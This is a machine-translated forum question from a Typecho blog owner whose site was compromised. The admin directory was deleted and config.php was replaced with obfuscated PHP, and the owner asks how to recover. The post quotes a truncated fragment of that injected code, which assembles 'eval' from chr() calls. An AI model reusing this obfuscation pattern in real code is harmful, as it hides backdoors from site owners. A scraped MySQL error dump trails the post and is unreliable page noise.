My typecho was hacked.

I haven"t written a blog for a long time, but I visit it occasionally, and the front desk is fine.

Today, I suddenly wanted to edit an article in the background. I found that in the background 404, the admin directory of the files was gone

.

then find that the root directory config.php content becomes the following similar encrypted

<?php $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(4....

then there is an exploited.txt file in the root directory

content is Qingfeng Jiuli, where to find you

who is so boring to hack my blog, and then only delete the background eraser.

here comes the problem

what is the correct recovery posture

Mar.02,2021

take a look at this? https://joyqi.com/typecho/abo.


mine, too, and then deleted

directly.
MySQL Query : SELECT * FROM `codeshelper`.`v9_news` WHERE status=99 AND catid='6' ORDER BY rand() LIMIT 5
MySQL Error : Disk full (/tmp/#sql-temptable-64f5-1b38897-2c103.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
MySQL Errno : 1021
Message : Disk full (/tmp/#sql-temptable-64f5-1b38897-2c103.MAI); waiting for someone to free some space... (errno: 28 "No space left on device")
Need Help?